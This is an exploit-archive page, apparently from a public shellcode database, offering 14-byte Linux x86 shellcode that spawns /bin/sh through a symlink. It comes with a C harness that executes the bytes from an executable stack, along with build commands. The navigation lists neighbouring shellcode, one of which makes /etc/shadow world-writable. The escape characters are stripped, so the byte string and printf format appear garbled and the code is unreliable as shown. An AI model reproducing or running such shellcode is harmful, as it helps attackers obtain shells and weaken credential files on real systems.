[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : 14 Bytes execve("a->/bin/sh") Local-only Shellcode
# Published : 2010-04-17
# Author : Magnefikko
# Previous Title : linux/x86 Self-modifying shellcode for IDS evasion 64 bytes
# Next Title : 33 Bytes chmod("/etc/shadow", 0777) Shellcode


#include <stdio.h>
#include <string.h>

/*
	by Magnefikko
	17.04.2010
	magnefikko@gmail.com
	Promhyl Studies :: http://promhyl.oz.pl
	Subgroup: #PRekambr
	Name: 14 bytes execve("a->/bin/sh") local-only shellcode
	Platform: Linux x86
	
	execve("a", 0, 0);

	$ ln -s /bin/sh a
	$ gcc -Wl,-z,execstack filename.c
	$ ./a.out
	
	Link is required.

	shellcode:

x31xc0x50x6ax61x89xe3x99x50xb0x0bx59xcdx80

*/


int main(){
	char shell[] = "x31xc0x50x6ax61x89xe3x99x50xb0x0bx59xcdx80";
	printf("by Magnefikkonmagnefikko@gmail.comnpromhyl.oz.plnnstrlen(shell)
= %dn", strlen(shell));
	(*(void (*)()) shell)();
}